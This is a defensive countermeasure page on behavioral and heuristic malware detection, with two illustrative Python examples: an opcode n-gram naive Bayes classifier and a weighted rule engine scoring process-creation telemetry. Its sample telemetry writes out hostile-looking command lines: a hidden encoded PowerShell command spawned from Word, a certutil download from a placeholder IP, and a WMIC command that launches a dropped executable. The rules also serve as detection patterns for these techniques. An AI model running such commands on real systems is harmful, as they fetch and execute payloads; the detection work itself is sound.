Enable Behavioral and Heuristic-based Malware Detection (CM0021)
- ID: CM0021
- Version: 1.0
- Created: 14 March 2025
- Modified: 14 March 2025
- Type: Enable
- Status: Active
Intended Outcome
Enabling behavioral and heuristic-based malware detection detects adversary execution of malicious code.
Introduction
Behavioral and heuristic-based malware detection software employs methods beyond the identification of specific file signatures or hashes to alert on and react to malware and malicious behavior. These methods rely on either a rules-based or a weight-based approach: a rules-based engine alerts when a single described behavior is observed, while a weight-based engine sums the scores of many weak indicators and alerts when the total crosses a threshold. Behavioral approaches typically detect anomalous behaviors such as unusual network traffic, abnormal file access patterns, unexpected system events, and/or atypical process behavior (for example, an Office application spawning a command interpreter). Heuristic methods use data mining and machine learning to analyze features such as API calls, opcodes, n-grams, and control flow graphs, so that a sample is scored on what it does rather than on a previously catalogued signature.
Preparation
- Understand the scope and responsibilities of the hunt.
- Determine whether additional resources or tooling will need to be allocated, provisioned, or acquired to enhance hunt practices.
- Prepare and document clear policies and procedures for investigating and handling malware samples and compromised systems.
Risks
- This countermeasure may result in excessive resource use.
- Deploying new tools may require a labor-intensive integration effort, and new rulesets require careful tuning and ongoing updates to keep false positives manageable. Either can overburden responders and operators.
- The tools may consume excessive amounts of CPU or memory on workstations, degrading performance.
- Assess the impact of deploying new tools before large-scale deployments.
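The heuristic, weight-based approach described in the Introduction, where a sample is scored on features such as opcode n-grams rather than matched against a hash, as an added example that is not code from the original page or from any vendor's product. It trains a multinomial naive Bayes classifier on a small constructed corpus of opcode mnemonic sequences; the corpus, the class labels, the n-gram length and the decision threshold are all assumptions for illustration. The threshold is where the tuning effort noted under Risks shows up in practice: raising it trades missed detections for fewer false positives.

```python
import math
from collections import Counter
from typing import Dict, Iterable, Sequence, Tuple


def opcode_ngrams(opcodes: Sequence[str], n: int) -> Counter:
    """Count the overlapping n-grams of an opcode mnemonic sequence."""
    return Counter(tuple(opcodes[i:i + n]) for i in range(len(opcodes) - n + 1))


class OpcodeNgramClassifier:
    """Multinomial naive Bayes over opcode n-grams with Laplace smoothing.

    Every n-gram is a feature; its log likelihood ratio between the two classes
    is the per-feature weight a weight-based heuristic engine sums for a sample.
    """

    def __init__(self, n: int = 2, alpha: float = 1.0):
        self.n, self.alpha = n, alpha
        self.counts: Dict[str, Counter] = {"malicious": Counter(), "benign": Counter()}
        self.docs: Counter = Counter()   # number of training samples per class
        self.vocab: set = set()          # every n-gram seen in either class

    def fit(self, samples: Iterable[Tuple[Sequence[str], str]]) -> "OpcodeNgramClassifier":
        for opcodes, label in samples:
            grams = opcode_ngrams(opcodes, self.n)
            self.counts[label].update(grams)
            self.docs[label] += 1
            self.vocab.update(grams)
        return self

    def _log_lik(self, gram: tuple, label: str) -> float:
        total = sum(self.counts[label].values())
        return math.log((self.counts[label][gram] + self.alpha)
                        / (total + self.alpha * len(self.vocab)))

    def log_odds(self, opcodes: Sequence[str]) -> float:
        """log P(malicious|x) - log P(benign|x). An n-gram seen only in one class
        pushes the score toward that class; one never seen in training adds only
        the smoothing baseline."""
        score = math.log(self.docs["malicious"] / self.docs["benign"])  # class prior
        for gram, k in opcode_ngrams(opcodes, self.n).items():
            score += k * (self._log_lik(gram, "malicious") - self._log_lik(gram, "benign"))
        return score

    def predict(self, opcodes: Sequence[str], threshold: float = 0.0) -> str:
        return "malicious" if self.log_odds(opcodes) > threshold else "benign"


# Constructed training corpus (not real disassembly): decoder-loop style sequences
# are labelled malicious, ordinary prologue/call/epilogue sequences benign.
TRAINING = [
    (["push", "mov", "xor", "inc", "cmp", "jne", "call", "jmp"], "malicious"),
    (["mov", "xor", "inc", "cmp", "jne", "push", "call", "jmp"], "malicious"),
    (["push", "call", "mov", "xor", "inc", "cmp", "jne", "jmp"], "malicious"),
    (["push", "mov", "sub", "lea", "call", "add", "pop", "ret"], "benign"),
    (["push", "mov", "lea", "call", "mov", "add", "pop", "ret"], "benign"),
    (["push", "sub", "mov", "call", "lea", "add", "pop", "ret"], "benign"),
]


def classify_samples(threshold: float = 0.0) -> Dict[str, Tuple[float, str]]:
    """Score two unseen (constructed) sequences; returns {name: (log_odds, label)}."""
    clf = OpcodeNgramClassifier(n=2).fit(TRAINING)
    unseen = {
        "decoder_variant": ["push", "mov", "xor", "inc", "cmp", "jne", "jmp"],
        "plain_function": ["push", "mov", "lea", "call", "add", "pop", "ret"],
    }
    return {name: (round(clf.log_odds(seq), 2), clf.predict(seq, threshold))
            for name, seq in unseen.items()}


if __name__ == "__main__":
    for name, (lo, label) in classify_samples().items():
        print(f"{name:16s} log-odds={lo:+6.2f} -> {label}")
```

Run it with `classify_samples(threshold=10.0)` to see the tuning risk directly: the decoder variant, which scores around +5.8 with these toy counts, drops to "benign" once the threshold is raised above its score, which is exactly the kind of missed detection a hastily tuned ruleset produces.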
Guidance
- Deploying malware detection tools is often thought of as a strictly preventative measure, but enabling them during incident response, with alerts for the behaviors observed in the incident so far, still adds visibility into living-off-the-land techniques the adversary subsequently executes. Those techniques use legitimate system binaries, so signature- and hash-based tooling alone will not flag them.
- Security operations should update their behavioral rulesets with new alerts based on observed adversary activities, malware behaviors recorded in detonation chambers (sandboxes), or recommendations from the security community.
- Step-by-step instructions for deploying new detection tools and technologies in the aftermath of an incident are beyond the scope of this countermeasure. Security operators should reflect on their unique organizational requirements and consult with the appropriate experts and vendors when considering new heuristic and behavioral technologies following an incident.
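The rules-based and weight-based behavioral detection described in the Introduction, and the ruleset update recommended in the Guidance above, as an added example that is not code from the original page or from any product. It runs a small set of behavioral rules over constructed process-creation telemetry (the shape of a Sysmon Event ID 1 or EDR record; the field names, rule names, weights, window and threshold are assumptions for illustration), sums the weights of the distinct rules that fire on a host inside a time window, and then shows the same telemetry re-scored after a rule written from observed adversary activity is added to the set.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record; field names are assumptions for this example."""
    ts: int        # seconds since epoch
    host: str
    parent: str    # parent image name, lower-case
    image: str     # image name, lower-case
    cmdline: str


@dataclass(frozen=True)
class Rule:
    name: str
    weight: int    # contribution to the per-host weighted score (illustrative values)
    match: Callable[[ProcEvent], bool]


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENC_PS = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.IGNORECASE)
URLCACHE = re.compile(r"-urlcache", re.IGNORECASE)
ACCOUNT_ENUM = re.compile(r"\b(?:user|group|localgroup)\b", re.IGNORECASE)

# Rules-based layer: each rule describes a behavior rather than a hash, so a
# renamed or repacked sample still trips it.
BASE_RULES: List[Rule] = [
    Rule("office_spawns_shell", 40, lambda e: e.parent in OFFICE and e.image in SHELLS),
    Rule("powershell_encoded_cmd", 30,
         lambda e: e.image == "powershell.exe" and ENC_PS.search(e.cmdline) is not None),
    Rule("certutil_urlcache", 35,
         lambda e: e.image == "certutil.exe" and URLCACHE.search(e.cmdline) is not None),
    Rule("account_enumeration", 10,
         lambda e: e.image in {"net.exe", "net1.exe"} and ACCOUNT_ENUM.search(e.cmdline) is not None),
    Rule("whoami_discovery", 10, lambda e: e.image == "whoami.exe"),
]


def evaluate(events: List[ProcEvent], rules: List[Rule],
             window: int = 600, threshold: int = 50) -> Dict[str, dict]:
    """Weight-based layer: per host, the largest sum of distinct rule weights that
    fire inside any `window`-second span. Low-weight discovery commands that never
    alert alone add up when they cluster with other hits on the same host."""
    per_host: Dict[str, List[Tuple[int, str, int]]] = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        for r in rules:
            if r.match(e):
                per_host[e.host].append((e.ts, r.name, r.weight))
    result: Dict[str, dict] = {}
    for host, hits in per_host.items():
        best = 0
        for i, (t0, _, _) in enumerate(hits):
            seen: Dict[str, int] = {}
            for t, name, w in hits[i:]:
                if t - t0 > window:
                    break
                seen[name] = w   # a rule counts once per window; repeats don't inflate the score
            best = max(best, sum(seen.values()))
        result[host] = {"hits": [(t, n) for t, n, _ in hits], "score": best,
                        "alert": best >= threshold}
    return result


# Constructed sample telemetry (not real data): ws01 is a macro-dropper chain,
# ws02 is hands-on-keyboard discovery, ws03 is an administrator's routine script.
SAMPLE_EVENTS = [
    ProcEvent(1000, "ws01", "winword.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAA="),
    ProcEvent(1030, "ws01", "powershell.exe", "certutil.exe",
              "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\\Users\\Public\\a.txt"),
    ProcEvent(2000, "ws02", "cmd.exe", "whoami.exe", "whoami /all"),
    ProcEvent(2010, "ws02", "cmd.exe", "net.exe", "net user"),
    ProcEvent(2020, "ws02", "cmd.exe", "net.exe", "net localgroup administrators"),
    ProcEvent(2030, "ws02", "cmd.exe", "wmic.exe",
              'wmic process call create "cmd.exe /c C:\\Users\\Public\\u.exe"'),
    ProcEvent(3000, "ws03", "explorer.exe", "powershell.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
    ProcEvent(3005, "ws03", "powershell.exe", "net.exe", "net localgroup administrators"),
]

# Ruleset update (Guidance): a rule written from activity observed during the
# incident, here process creation through WMIC, added without redeploying tooling.
WMIC_CREATE = re.compile(r"process\s+call\s+create", re.IGNORECASE)
OBSERVED_RULE = Rule("wmic_process_create", 35,
                     lambda e: e.image == "wmic.exe" and WMIC_CREATE.search(e.cmdline) is not None)


def run_before_and_after() -> Tuple[Dict[str, dict], Dict[str, dict]]:
    """Score the same telemetry with the baseline ruleset and with the observed rule added."""
    return evaluate(SAMPLE_EVENTS, BASE_RULES), evaluate(SAMPLE_EVENTS, BASE_RULES + [OBSERVED_RULE])


if __name__ == "__main__":
    for label, res in zip(("baseline", "updated "), run_before_and_after()):
        for host, r in sorted(res.items()):
            print(f"{label} {host} score={r['score']:3d} alert={r['alert']} "
                  f"hits={[n for _, n in r['hits']]}")
```

With the baseline ruleset ws01 alerts immediately (three high-weight behaviors inside thirty seconds), ws03's legitimate `net localgroup` scores 10 and stays quiet, and ws02's discovery chain totals only 20 because WMIC process creation has no rule. Adding the rule derived from what was observed lifts ws02 to 55 and over the threshold, which is the point of feeding incident observations back into the ruleset rather than waiting on a new signature.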